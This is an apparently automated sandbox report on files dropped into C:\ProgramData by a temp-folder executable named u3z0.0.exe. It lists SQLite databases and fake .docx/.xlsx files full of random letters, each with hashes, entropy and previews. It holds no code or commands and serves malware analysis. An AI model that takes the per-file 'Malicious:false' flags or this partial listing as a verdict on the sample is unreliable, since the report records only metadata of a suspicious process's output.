                                                                                                                                                                                                                                                                                      Preview:BQJUWOYRTOLXZEKCXDLSWRNMFMCSYXRPFWPCFOMLTXRLOYSWDYNKGJBBEKHPTUBSJDZWIUKDQVTQQAEIJPJKOPTWULSKKXLSOLVYRREVXVSZLFQQBXKKCMYLLBRWPJMBHNBFTQUBUPFYXLIARNGQLIDNRZYVXHIWZXDZUYNJJXBTDFJWBKWCQQGPRFDTAZULKSSEFZTUDJOKODZLAIWAICBXNPXUMZFRUVBQDJIENEPBRWTDBODAVKDNOLRNYNBKKQBPGBUTIJCMZXSCKDRZIHJDDUPOXQOJQXAOMBHVIUUZBSRKPYCRBAHBBGKXGMODRWMTAMVEFAPKYMHWCUCKKJSLQYPIMPYZKZKPIXSZAPTLQLZGQHTXZBXONOWDVDWQMPDILYOIVFKXBUSTSFUGKZZBFUUTDDOMVPOINIMBFTSGRRDLSLPUXATPQGHCHIJRAGXNYBQOTZSNMAZCEDHOUMBJWJSCXGDMRQCIYNBQTBGKDTCTKRJCRXWGYTZRFYVOFBTBDYLRCDVRFBCHFMPWSBHHWRRLBRKCLDQRSMCLVZAGFMWLPHYJGALXNLZXJVWWXBFHYIZDZFXDBTHZKRDQBGOXOULNHYYUXXATXCLPLWIUBSSSLNJBTSMXAWVUVUVKDAOHXCIVGHJLVIETMJMFWUZTFVNALCFBKNUVWGXUEPDHVHGOBZRVOPDFCORECRQJIXMUFIACDLBMTHCLLXOISHLMFTEBKUAICYBSNGCASKNQBLIPLSIPNJTWJLGARSXDGLOKVQSUASJSIRFNLKQTPVOVXSGKMXEEUVWMULGSMRQRMICWPXBVELHRSUIIUSGMSRWNPMSLNFKZWDRGGAVGKNPMSZMHRWAKTDXUHZPMIYCRABYQLAAVOSTLMEJGFHJSMBRQBEICTCXKKZHNUWSZMQZHAMPRHAWDVATODUFFRHCHJYGQZNMBWVRFZTJLSUUUMCUEOZEUMCJAOLHOIJTNPLJBASLIHCUCMVTUNIOK

                                                                                                                                                                                                                                                                                      C:\ProgramData\CGDBGCBGIDHCBGDHIEBFHCBFHD

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\DGCGDBGC

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\DGCGDBGCAAEBFIECGHDGCAAEGD

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8439810553697228
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                                                                                                                                                                      MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                                                                                                                                                                      SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                                                                                                                                                                      SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                                                                                                                                                                      SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\DUUDTUBZFW.xlsx

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.701195573484743
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                                                                                                                                                                                                                                                      MD5:2530C45A92F347020337052A8A7D7B00
                                                                                                                                                                                                                                                                                      SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                                                                                                                                                                                                                                                      SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                                                                                                                                                                                                                                                      SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                                                                                                                                                                                                                                                                                      C:\ProgramData\EBAKFIIJ

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\EFOYFBOLXA.docx

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.696178193607948
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                                                                                                                                                                                                                                                      MD5:960ECA5919CC00E1B4542A6E039F413E
                                                                                                                                                                                                                                                                                      SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                                                                                                                                                                                                                                                      SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                                                                                                                                                                                                                                                      SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                                                                                                                                                                                                                                                      C:\ProgramData\EFOYFBOLXA.xlsx

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.696178193607948
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                                                                                                                                                                                                                                                      MD5:960ECA5919CC00E1B4542A6E039F413E
                                                                                                                                                                                                                                                                                      SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                                                                                                                                                                                                                                                      SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                                                                                                                                                                                                                                                      SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                                                                                                                                                                                                                                                      C:\ProgramData\EHDAFIJJECFHJJKFCAKJJKEHID

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):98304
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\EIVQSAOTAQ.docx

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.692024230831571
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                                                                                                                                                                                                                                                      MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                                                                                                                                                                                                                                                      SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                                                                                                                                                                                                                                                      SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                                                                                                                                                                                                                                                      SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

                                                                                                                                                                                                                                                                                      C:\ProgramData\FCGIJKJJKEBGHJKFIDGC

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):51200
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\FGAWOVZUJP.xlsx

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.697476937124145
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:ZHCq3JbSxIq6BFnj6ku15ZgD3mwworSHynqRkWcVy:ZJJBdjzutVwdrEynqRJcs
                                                                                                                                                                                                                                                                                      MD5:B5DCEDFE74691665C5378C902E1B8783
                                                                                                                                                                                                                                                                                      SHA1:1C015C1000EDCC8DD1D41E7A6164A1441BCAB71F
                                                                                                                                                                                                                                                                                      SHA-256:BFECD17BD22F40F72127A4F28CC8347BEB2F2472D795E5D895FA58D6B95408D8
                                                                                                                                                                                                                                                                                      SHA-512:DEA52E292EC1F0D73BC6ACE2DC5B03E635FC5196670127259950249458C92286C02381757CF5BE56D360143ABF746BFE86C67A457FE9F5FED38ACBBBFBB5C058
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:FGAWOVZUJPPATBQBCAOSECFNMMWXFFRHTNXLMTZXOSUBNMNZEOSEMDJLPBYZGEPOGNWBKCOTZRTGUDWXFPEASJZZLPJOWHXSZQVUIUJBUYTTDXUEQLNHZUXAUICSVWRHLMSRSGQFYHYRCDBUWZTRUIBPPWVSMYQHOSYXAKFNZSTYPDUMFGRHSJOIABJMBNUZXMMXDRNTJYWFUTDFDFSDCBPOBTGVPULEAEIYVPDJOVTAEKQCIGDYMYVBWZZIRSHYWTBVKCHCOLGCNLMCBUTSIELOJKUUMMCZDHMWQNQNLXRUFYXSFAOXPFTCOSFCUWRGZXPLGZHQAMLUZYGKXSSGNXKZMQWRXRFBGEZMVDXSRYYDYPORROJGMIYSCFXTAAWWWNLVAXKAJUUMUAWQYLCXUUIKKYPCYHXPWDZHUIGECKGVMMJAQEHPNQIZEFHEPPYZPRUOWVQXECLRCFOCSQWBRIRYDRDMZHVKITRLGBFZGTUUNMZCHIJCFWLJUZSUNWWPGERMDNVCVSDOMULGXMPRCUDOSJRMMZEXFUKRZUMZLFHELPWZFZXMXOXWWLAMDCZPGWQEGRZTHRSTHXOYYZRFSXRIVARPEJIEGIUIDAFUBPQZCRTXBVJXOUVEGEVTQYQDNNKPHXVIJLAVYPEQZEKXESZQYRISHBWFUCXRDHKRZLFLEXQPRCFTNMMHTEQGKKVBCJAAYTZEDWCNHBNEYWQHUXQPNRXLKHICNGERBIZIELZFWMSBPLYLUWVCILSRSYSXVVAEEVHXDEEVJJQFHUIVDCQWDIMKIBLIQLDLKHIDGEYLUEOOHUSRQLIVZOLOJYWYGORFEFHDXTVUODOTBLKQVTOLSVNVECTSBGCPTOPYKZPHFUAZRLBKILWDHPUBQHFWDBJKXZWIAFTFVIZWSSQVGQBOQXBCLOMSKQAOSVJFENDQHDBKSPWYDHIJFWMCFBRJKZDVFYEFTKUVDGNFGUGWBZBODVWZTFPQEFHTEWBN

                                                                                                                                                                                                                                                                                      C:\ProgramData\GRXZDKKVDB.docx

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.697358951122591
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                                                                                                                                                                                                                                                      MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                                                                                                                                                                                                                                                      SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                                                                                                                                                                                                                                                      SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                                                                                                                                                                                                                                                      SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                                                                                                                                                                                                                                                      Malicious:false
